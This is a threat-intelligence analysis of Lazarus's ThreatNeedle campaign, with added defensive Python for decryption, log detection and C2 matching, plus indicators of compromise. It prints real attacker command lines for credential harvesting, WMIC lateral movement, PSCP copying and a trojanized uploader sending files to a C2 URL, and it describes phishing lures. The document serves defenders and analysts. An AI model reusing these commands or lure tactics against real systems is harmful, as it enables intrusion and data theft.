We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed targets depending on its primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. After taking a closer look, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.
The group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered from publicly available sources. After gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in more than a dozen countries have been affected.
During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights gathered so far, it was possible to establish the relationship with other Lazarus group campaigns.
In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.
Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s hottest topic: COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a medical center that is part of the organization under attack.
Phishing email with links to malicious documents
The attackers registered accounts with a public email service, making sure the sender’s email addresses appeared similar to the medical center’s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to find this information on the medical center’s public website.
The document contains information on the population health assessment program and is not directly related to the subject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning of the contents they used.
Contents of malicious document
The content of the lure document was copied from an online post by a health clinic.
Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in the Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.
Email with instructions on enabling macros #1
After sending the above email with instructions, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email showing the required procedure in a screenshot with a Russian language pack.
Email with instructions on enabling macros #2
The content of the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they were not native Russian speakers and were using translation tools.
Email containing several grammatical mistakes
The group also used different types of spear-phishing attack. One of the compromised hosts received several spear-phishing documents on May 19, 2020. The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.
However, no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few weeks later, the same host opened a different malicious document. The threat actor wiped these files from disk after the initial infection, meaning they could not be obtained.
Nonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a payload and a shortcut file and then continues executing the payload using the following command line parameters.
Payload path: %APPDATA%\Microsoft\Windows\lconcaches.db
Shortcut path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk
Command line (note that the string at the end is hard-coded, but different for each sample): rundll32.exe [dllpath], Dispatch n2UmQ9McxUds2b29
The content of the decoy document describes the job of a generator/power industry engineer.
Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a family belonging to the Lazarus group. We previously observed the Lazarus group use this cluster when attacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire infection process is known and has not changed dramatically compared to previous findings, the Lazarus group continued using ThreatNeedle malware aggressively in this campaign.
The payload created by the initial spear-phishing document loads the next stage as a backdoor running in memory: the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several variations and serves the primary purpose of loading the last stage of the ThreatNeedle malware in memory.
Upon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to “7486513879852”. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.
Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that was chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened.
It then decrypts the embedded payload using the RC4 algorithm, saves it with an .xml extension and a randomly generated five-character file name in the current directory, and then copies it to the system folder with a .sys extension.
This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4.
We have seen several variations of the ThreatNeedle loader:
- Loading the payload from the registry.
- Loading the payload from itself after RC4 decryption and decompression.
- Loading the payload from itself after AES decryption and decompression.
- Loading the payload from itself after decompression.
- Loading the payload from itself after one-byte XORing.
Most loader-style malware variants check the command line parameter and only proceed with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we’ve seen is similar to the ThreatNeedle installer: the malware decrypts an embedded string using RC4, and compares it with the parameter “Sx6BrUk4v4rqBFBV” upon launching. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.
The other variant of the loader retrieves the next stage payload from the victim’s registry. As we can see from the installer malware description, we suspect that the registry key was created by the installer component. The data retrieved from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and the export function is invoked.
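The installer and loader gate described above (RC4-decrypt an embedded string, compare it with a hard-coded value, only then decrypt the next stage) is straightforward to mirror in an analysis script. The following is an added example, not code from the Securelist post or from the malware: it implements RC4 with the two keys quoted above and shows how an analyst would use them to recover the launch-gate strings and to carve other RC4-protected strings from a sample. The "encrypted" blobs are constructed inside the script by running the same keys over the known strings, so it runs offline as a self-check; pairing the loader key with the loader’s parameter string is an assumption made for the demonstration.

```python
# Added example, not code from the Securelist post or from the malware itself:
# a small RC4 helper of the kind an analyst writes to recover ThreatNeedle's
# embedded strings and payloads. The two keys and the two expected strings are
# quoted from the post; the "encrypted" sample blobs below are CONSTRUCTED here
# by running the same keys over those strings, standing in for bytes carved
# from a real sample. Pairing the loader key with the loader's parameter string
# is an assumption made for the demonstration.
from typing import Iterable, List

INSTALLER_KEY = bytes.fromhex("B6B72D8C6B5F14DFB138A17389C1D2C4")
LOADER_KEY = bytes.fromhex("3D68D00AB10EC6AFDDEE188EF4A1D620")
INSTALLER_MAGIC = b"7486513879852"
LOADER_PARAM = b"Sx6BrUk4v4rqBFBV"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream XOR). Decryption is the same as encryption."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def passes_launch_gate(blob: bytes, key: bytes, expected: bytes) -> bool:
    """Mirror of the check the post describes: the installer/loader RC4-decrypts an
    embedded string and compares it with a hard-coded value (or command line
    parameter) before it goes on to decrypt and run the next stage."""
    return rc4(key, blob) == expected


def carve_rc4_strings(candidates: Iterable[bytes], key: bytes) -> List[bytes]:
    """Decrypt each candidate blob with the known key and keep the ones that come
    out as printable ASCII. Handy when sweeping a sample's data section for
    RC4-protected strings such as C2 URLs or service names."""
    found = []
    for blob in candidates:
        plain = rc4(key, blob)
        if plain and all(0x20 <= b < 0x7F for b in plain):
            found.append(plain)
    return found


# CONSTRUCTED sample blobs (see header comment).
SAMPLE_INSTALLER_BLOB = rc4(INSTALLER_KEY, INSTALLER_MAGIC)
SAMPLE_LOADER_BLOB = rc4(LOADER_KEY, LOADER_PARAM)

if __name__ == "__main__":
    print("installer gate:", passes_launch_gate(SAMPLE_INSTALLER_BLOB, INSTALLER_KEY, INSTALLER_MAGIC))
    print("loader gate:   ", passes_launch_gate(SAMPLE_LOADER_BLOB, LOADER_KEY, LOADER_PARAM))
    print("carved:", carve_rc4_strings([SAMPLE_INSTALLER_BLOB], INSTALLER_KEY))
```

In practice the candidate blobs come from a sample’s data section (for instance, every run of bytes between null terminators), and the same `rc4()` call is what decrypts the registry-stored configuration and the embedded next-stage archive once the right key is known.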
From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation”.
Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary purpose of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a custom tool that will be described in the “Exfiltration” section. Below is a rough timeline of the compromise we analyzed:
Timeline of infected hosts
During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command:
[Responder file path] -i [IP address] -rPv
Several days later, the attacker started to move laterally from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.
After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement techniques were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use”.
net use \\[IP address]\IPC$ "[password]" /u:"[user name]" > $temp\~tmp5936t.tmp 2>&1

Commands were then executed on the remote host via WMIC:

wmic.exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd.exe /c $appdata\Adobe\adobe.bat"
wmic.exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd /c sc queryex helpsvc > $temp\tmp001.dat"
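The three command lines above are plain Windows administration tools, so detection has to key on how they are combined: an IPC$ connection with credentials passed inline, WMIC process creation against a remote node with a password on the command line, and a service query redirected into a temp file. The following is an added example, not code from the Securelist post: it encodes those combinations as patterns and runs them over constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields. Host names, users, addresses and paths in the sample events are invented.

```python
# Added example, not from the Securelist post: detection logic for the lateral
# movement command lines quoted above, run over CONSTRUCTED process-creation
# records shaped like the fields of Sysmon Event ID 1 / Security event 4688.
# Host names, user names, addresses and paths are invented for the demonstration.
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str
    command_line: str


# Patterns derived from the commands in the post: IPC$ connection with inline
# credentials, WMIC remote process creation, and a service query redirected to %temp%.
NET_USE_IPC = re.compile(r"\bnet(?:\.exe)?\s+use\s+\\\\[^\s\\]+\\IPC\$", re.I)
INLINE_CREDS = re.compile(r"/u(?:ser)?:", re.I)
WMIC_REMOTE_EXEC = re.compile(r"\bwmic(?:\.exe)?\b.*?/node:.*?process\s+call\s+create", re.I | re.S)
WMIC_PASSWORD = re.compile(r"/password:", re.I)
SC_QUERY_TO_TEMP = re.compile(r"\bsc(?:\.exe)?\s+queryex\b.*?>\s*\S*temp", re.I)


def classify(ev: ProcessEvent) -> List[str]:
    """Return the detection tags that fire on one process-creation event."""
    tags = []
    cl = ev.command_line
    if NET_USE_IPC.search(cl):
        tags.append("net_use_ipc_share")
        if INLINE_CREDS.search(cl):
            tags.append("net_use_inline_credentials")
    if WMIC_REMOTE_EXEC.search(cl):
        tags.append("wmic_remote_process_create")
        if WMIC_PASSWORD.search(cl):
            tags.append("wmic_inline_password")
    if SC_QUERY_TO_TEMP.search(cl):
        tags.append("service_query_written_to_temp")
    return tags


def detect(events: List[ProcessEvent]) -> List[Dict]:
    """Run classify() over a batch and return one alert per event that matched."""
    alerts = []
    for ev in events:
        tags = classify(ev)
        if tags:
            alerts.append({"host": ev.host, "user": ev.user, "tags": tags,
                           "command_line": ev.command_line})
    return alerts


# CONSTRUCTED events: three modelled on the post's commands, two benign admin commands.
SAMPLE_EVENTS = [
    ProcessEvent("WS-ADMIN01", "CORP\\jdoe", r"C:\Windows\System32\net.exe",
                 r'net use \\10.0.5.20\IPC$ "P@ssw0rd" /u:"CORP\svc_backup" > %temp%\~tmp5936t.tmp 2>&1'),
    ProcessEvent("WS-ADMIN01", "CORP\\jdoe", r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic.exe /node:10.0.5.20 /user:"CORP\svc_backup" /password:"P@ssw0rd" '
                 r'PROCESS CALL CREATE "cmd.exe /c %appdata%\Adobe\adobe.bat"'),
    ProcessEvent("WS-ADMIN01", "CORP\\jdoe", r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic.exe /node:10.0.5.20 /user:"CORP\svc_backup" /password:"P@ssw0rd" '
                 r'PROCESS CALL CREATE "cmd /c sc queryex helpsvc > %temp%\tmp001.dat"'),
    ProcessEvent("WS-HR07", "CORP\\asmith", r"C:\Windows\System32\net.exe",
                 r"net use Z: \\fileserver\share /persistent:yes"),
    ProcessEvent("WS-HR07", "CORP\\asmith", r"C:\Windows\System32\wbem\WMIC.exe",
                 r"wmic os get caption"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["host"], alert["tags"], alert["command_line"])
```

The nested tags matter for triage: an IPC$ mapping alone is noisy in an admin-heavy environment, but an IPC$ mapping with a password on the command line, followed within minutes by WMIC process creation from the same workstation to the same node, is close to the sequence described in the post and is what the correlation rule should require.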
Overcoming network segmentation
In the course of this research, we identified another highly interesting technique used by the attackers for lateral movement and exfiltration of stolen data. The enterprise network under attack was divided into two segments: corporate (a network on which computers had internet access) and restricted (a network on which computers hosted sensitive data and had no internet access). According to corporate policies, no transfer of information was permitted between these two segments. In other words, the two segments were meant to be completely separated.
Initially, the attackers were able to get access to systems with internet access and spent a long time distributing malware between machines in the network’s corporate segment. Among the compromised machines were those used by the administrators of the enterprise’s IT infrastructure.
It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a result, by gaining control of administrator workstations the attackers were able to access the restricted network segment.
The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. The router was a virtual machine running CentOS to route traffic between several network interfaces based on predefined rules.
Connection layout between victim’s network segments
According to the evidence collected, the attackers scanned the router’s ports and found a Webmin interface. Next, the attackers logged in to the web interface using a privileged root account. It’s unknown how the attackers were able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the infected systems’ browser password managers.
Log of Webmin web interface logins
By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization’s corporate and restricted segments.
List of services used on the router
Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTY PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.
New connection layout after attacker’s intrusion
In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.
Hardcoded proxy address in the malware
Since the attackers regularly deleted log files from the router, only a handful of commands entered on the command line via SSH could be recovered. An analysis of these commands shows that the attackers tried to reconfigure traffic routing using the route command.
The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activities from the router, using the logrotate utility to set up automatic deletion of log files.
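The router abuse described in this section leaves a specific trace even when the attackers rotate away most logs: Apache acting as a forward proxy records the request line with an absolute URL (`GET http://host/path`) or a `CONNECT host:port`, and the client address tells you which segment the request came from. The following is an added example, not code from the Securelist post, that parses Apache combined-format access log lines and flags proxy requests from a restricted-segment address to any host outside that segment. The two address ranges and all log lines are constructed for the demonstration (203.0.113.0/24 is a documentation range standing in for the external C2).

```python
# Added example, not from the Securelist post: spotting a segment-bridging proxy
# in Apache access logs. The post says the attackers configured Apache on the
# router VM as a proxy between the corporate and restricted segments; a forward
# proxy leaves a distinctive trace because the request line carries an absolute
# URL ("GET http://host/path") or a CONNECT. The two address ranges and all log
# lines below are CONSTRUCTED for the demonstration (203.0.113.0/24 is a
# documentation range standing in for the external C2).
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed segment layout for the example.
CORPORATE = ipaddress.ip_network("10.10.0.0/16")
RESTRICTED = ipaddress.ip_network("10.20.0.0/16")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def proxied_destination(method: str, target: str) -> Optional[str]:
    """Host the proxy was asked to reach, or None for an ordinary local request."""
    if method.upper() == "CONNECT":
        return target.rsplit(":", 1)[0]
    if "://" in target:
        return urlsplit(target).hostname
    return None


def in_restricted(host: str) -> bool:
    try:
        return ipaddress.ip_address(host) in RESTRICTED
    except ValueError:
        return False  # a DNS name is never inside the restricted range


def find_segment_bridging(lines: List[str]) -> List[Dict[str, str]]:
    """Flag proxy requests from a restricted-segment client to anywhere outside it."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        dest = proxied_destination(rec["method"], rec["target"])
        if dest is None:
            continue
        try:
            client = ipaddress.ip_address(rec["client"])
        except ValueError:
            continue
        if client in RESTRICTED and not in_restricted(dest):
            findings.append({"ts": rec["ts"], "client": rec["client"],
                             "method": rec["method"], "dest": dest})
    return findings


# CONSTRUCTED log lines: two bridging requests, one ordinary page fetch, one
# corporate-side proxy request, one restricted-to-restricted proxy request.
SAMPLE_LOG = [
    '10.20.1.5 - - [10/Jul/2020:14:02:11 +0300] "POST http://203.0.113.10/uploads/index.asp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.20.1.5 - - [10/Jul/2020:14:02:40 +0300] "CONNECT 203.0.113.10:443 HTTP/1.1" 200 0 "-" "-"',
    '10.10.3.7 - - [10/Jul/2020:14:03:01 +0300] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.10.3.7 - - [10/Jul/2020:14:03:15 +0300] "GET http://203.0.113.10/ HTTP/1.1" 200 300 "-" "curl/7.64"',
    '10.20.1.9 - - [10/Jul/2020:14:04:00 +0300] "GET http://10.20.2.2/status HTTP/1.1" 200 44 "-" "curl/7.64"',
]

if __name__ == "__main__":
    for finding in find_segment_bridging(SAMPLE_LOG):
        print(finding)
```

Because the attackers used logrotate to discard the router’s own logs, this check is most valuable when the access log is shipped off the router as it is written; a forward-proxy request line appearing on a host that was never meant to proxy anything is a finding on its own, and the restricted-segment client address makes it a policy violation.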
We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four parameters: client IP address, client port, server IP address and server port. The tool offers basic functionality, forwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic using trivial binary encryption.
Using the covert channel, the adversary copied data from the remote server over to the host using the PuTTY PSCP tool:
%APPDATA%\PBL\unpack.tmp -pw [password] root@[IP address]:/tmp/cab0215 %APPDATA%\PBL\cab0215.tmp
After copying data from the server, the actor used the custom tool to exfiltrate stolen data to the remote server. This malware looks like a legitimate VNC client and runs like one if it’s executed without any command line parameters.
Execution of malware without parameters
However, if this application is executed with specific command line parameters, it runs an alternate, malicious function. According to our telemetry, the actor executed this application with six parameters:
%APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000
Also, if the number of command line parameters is higher than six, the malware jumps into a malicious routine. The malware also checks the length of the second argument: if it’s less than 29 characters, it terminates the execution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next payload.
The embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the preceding byte. Next, the XORed blob is further decrypted using the second command line argument that is passed (in this case S0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and depending on their number it runs differently. For instance, it can also receive proxy server addresses with the “-p” option.
When the decrypted in-memory payload is executed, it compares the header of the configuration data passed with the string “0x8406” in order to confirm its validity. The payload opens a dedicated file (in this case %APPDATA%\Comms\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data to the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:
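The upload behaviour gives network defenders two concrete observables: an HTTP POST whose form body carries exactly the two parameters ‘fr’ and ‘fp’, and the exfiltration URLs listed in Appendix I. The following is an added example, not code from the Securelist post, that scores HTTP request records (as a web proxy or NIDS would log them) on both. The C2 URLs are a subset copied from Appendix I and kept defanged; the request records and their body values are constructed for the demonstration.

```python
# Added example, not from the Securelist post: matching the upload behaviour of
# the Trojanized VNC Uploader in HTTP request records (from a web proxy or NIDS).
# Two observables come from the post: the uploads are HTTP POSTs carrying exactly
# two form parameters named 'fr' and 'fp', and the C2 URLs listed in Appendix I.
# The request records below are CONSTRUCTED; the body values are invented.
import re
from typing import Dict, List, Set
from urllib.parse import parse_qs, urlsplit

# A few of the post's "C2 URLs to exfiltrate files used by Trojanized VNC Uploader",
# kept defanged exactly as published.
VNC_UPLOADER_C2 = [
    "hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php",
    "hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp",
    "hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp",
]
MULTIPART_NAME = re.compile(r';\s*name="([^"]+)"')


def refang(url: str) -> str:
    return url.replace("hxxp", "http").replace("[.]", ".")


def normalize(url: str) -> str:
    """scheme://host[:port]/path in lower case, dropping a default port so that
    'https://x.com:443/a' and 'https://x.com/a' compare equal."""
    p = urlsplit(url)
    host = p.hostname or ""
    default_port = 443 if p.scheme.lower() == "https" else 80
    if p.port and p.port != default_port:
        host = f"{host}:{p.port}"
    return f"{p.scheme}://{host}{p.path}".lower()


C2_SET: Set[str] = {normalize(refang(u)) for u in VNC_UPLOADER_C2}


def body_params(body: str, content_type: str) -> Set[str]:
    """Form field names from a urlencoded or multipart body."""
    if content_type.lower().startswith("multipart/form-data"):
        return set(MULTIPART_NAME.findall(body))
    return set(parse_qs(body, keep_blank_values=True).keys())


def score(req: Dict[str, str]) -> List[str]:
    """Reasons this request resembles the uploader's traffic (empty list = clean)."""
    reasons = []
    if req["method"].upper() == "POST" and body_params(req["body"], req["content_type"]) == {"fr", "fp"}:
        reasons.append("post_with_fr_fp_params")
    if normalize(req["url"]) in C2_SET:
        reasons.append("known_vnc_uploader_c2_url")
    return reasons


# CONSTRUCTED request records: two uploader-like POSTs, one ordinary login POST,
# one GET to a listed URL (URL hit only).
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp",
     "content_type": "application/x-www-form-urlencoded", "body": "fr=AB1234&fp=UklGRi4AAABXQVZF"},
    {"method": "POST", "url": "https://prototypetrains.com/forums/core/cache/index.php",
     "content_type": "multipart/form-data; boundary=b",
     "body": '--b\r\nContent-Disposition: form-data; name="fr"\r\n\r\nAB1234\r\n'
             '--b\r\nContent-Disposition: form-data; name="fp"; filename="cab59.tmp"\r\n\r\n...\r\n--b--'},
    {"method": "POST", "url": "https://intranet.example/login",
     "content_type": "application/x-www-form-urlencoded", "body": "user=a&pass=b"},
    {"method": "GET", "url": "https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp",
     "content_type": "", "body": ""},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["method"], req["url"], score(req))
```

The parameter-name check is the more durable of the two signals: the post shows the C2 URLs being compromised legitimate sites, which change between campaigns, whereas the ‘fr’/‘fp’ pair is a property of the uploader itself. Requiring the field set to be exactly those two names keeps ordinary forms that happen to include an `fp` field from matching.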
Contents of fp parameter
We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed solely to the Lazarus group. During this investigation, we were able to find connections to several other clusters of the Lazarus group.
Connections between Lazarus campaigns
Connection with DeathNote cluster
During this investigation we identified several connections with the DeathNote (a.k.a. Operation Dream Job) cluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats use the same C2 server URLs.
In addition, while analyzing the C2 server used in this attack, we identified a custom web shell script that was also detected on the DeathNote C2 server. We also found that the server script corresponding to the Trojanized VNC Uploader was present on the DeathNote C2 server.
Connection with Operation AppleJeus
We also found a connection with Operation AppleJeus. As we described, the actor used a custom tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was used in Operation AppleJeus as well.
Same tunneling tool
Connection with Bookcode cluster
In our previous blog about the Lazarus group, we mentioned the Bookcode cluster attributed to the Lazarus group; recently the Korea Internet and Security Agency (KISA) also published a report about the operation. In the report, they mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads. While investigating this incident, we also saw LPEClient on the host infected with ThreatNeedle. So, we assess that the ThreatNeedle cluster is connected to the Bookcode operation.
In recent years, the Lazarus group has focused on attacking financial institutions in various regions of the world. However, starting in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously used the ThreatNeedle malware seen in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks.
This investigation allowed us to establish strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its level of sophistication and its ability to circumvent the security measures it faces during its attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and infrastructure among these campaigns to accomplish their goals.
Appendix I - Indicators of Compromise
MD5                               File path
e7aa0237fc3db67a96ebd877806a2c88  Boeing_AERO_GS.docx

b191cc4d73a247afe0a62a8c38dc9137  %APPDATA%\Microsoft\DRM\logon.bin
9e440e231ef2c62c78147169a26a1bd3  C:\ProgramData\ntnser.bin
b7cc295767c1d8c6c68b1bb6c4b4214f  C:\ProgramData\ntnser.bin
0f967343e50500494cf3481ce4de698c  C:\ProgramData\Microsoft\MSDN\msdn.bin
09aa1427f26e7dd48955f09a9c604564  %APPDATA%\Microsoft\info.dat
07b22533d08f32d48485a521dbc1974d  C:\ProgramData\adobe\load.dat
1c5e4d60a1041cf2903817a31c1fa212  C:\ProgramData\Adobe\adobe.tmp
4cebc83229a40c25434c51ee3d6be13e  C:\ProgramData\Adobe\up.tmp
23b04b18c75aa7d286fea5d28d41a830  %APPDATA%\Microsoft\DRM\logon.dat
319ace20f6ffd39b7fff1444f73c9f5d  %APPDATA%\Microsoft\DRM\logon.bin
45c0a6e13cad26c69eff59fded88ef36  %APPDATA%\Microsoft\DRM\logon.dat
486f25db5ca980ef4a7f6dfbf9e2a1ad  C:\ProgramData\ntusers.dat
1333967486d3ab50d768fb745dae9af5  C:\PerfLogs\log.bin
07b22533d08f32d48485a521dbc1974d  C:\ProgramData\Adobe\load.dat
c86d0a2fa9c4ef59aa09e2435b4ab70c  %TEMP%\ETS4659.tmp
69d71f06fbfe177fb1a5f57b9c3ae587  %APPDATA%\Microsoft\Windows\shsvcs.db
7bad67dcaf269f9ee18869e5ef6b2dc1

36ab0902797bd18acd6880040369731c  %SYSTEMROOT%\LogonHours.sys
db35391857bcf7b0fa17dbbed97ad269  %ALLUSERSPROFILE%\Adobe\update.tmp
be4c927f636d2ae88a1e0786551bf3c4  %ALLUSERSPROFILE%\Adobe\unpack.tmp
728948c66582858f6a3d3136c7fbe84a  %APPDATA%\Microsoft\IBM.DAT
06af39b9954dfe9ac5e4ec397a3003fb

1a17609b7df20dcb3bd1b71b7cb3c674  %ALLUSERSPROFILE%\ntuser.bin
459be1d21a026d5ac3580888c8239b07  %ALLUSERSPROFILE%\ntuser.bin
87fb7be83eff9bea0d6cc95d68865564  %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys
062a40e74f8033138d19aa94f0d0ed6e  %APPDATA%\microsoft\OutIook.db
9b17f0db7aeff5d479eaee8056b9ac09  %TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp

Trojanized VNC Uploader

File path
%SYSTEMROOT%\system32\bcdbootinfo.tlp
%SYSTEMROOT%\system32\Nwsapagent.sys
%SYSTEMROOT%\system32\SRService.sys
%SYSTEMROOT%\system32\NWCWorkstation.sys
%SYSTEMROOT%\system32\WmdmPmSp.sys
%SYSTEMROOT%\system32\PCAudit.sys
%SYSTEMROOT%\system32\helpsvc.sys

Domains and IPs
hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php
hxxp://www.au-pair[.]org/admin/Newspaper[.]asp
hxxp://www.au-pair[.]org/admin/login[.]asp
hxxp://www.colasprint[.]com/_vti_log/upload[.]asp
hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp
hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp
hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp
hxxp://www.sanatoliacare[.]com/include/indicator[.]asp
hxxps://americanhotboats[.]com/forums/core/cache/index[.]php
hxxps://docentfx[.]com/wp-admin/includes/upload[.]php
hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php
hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php
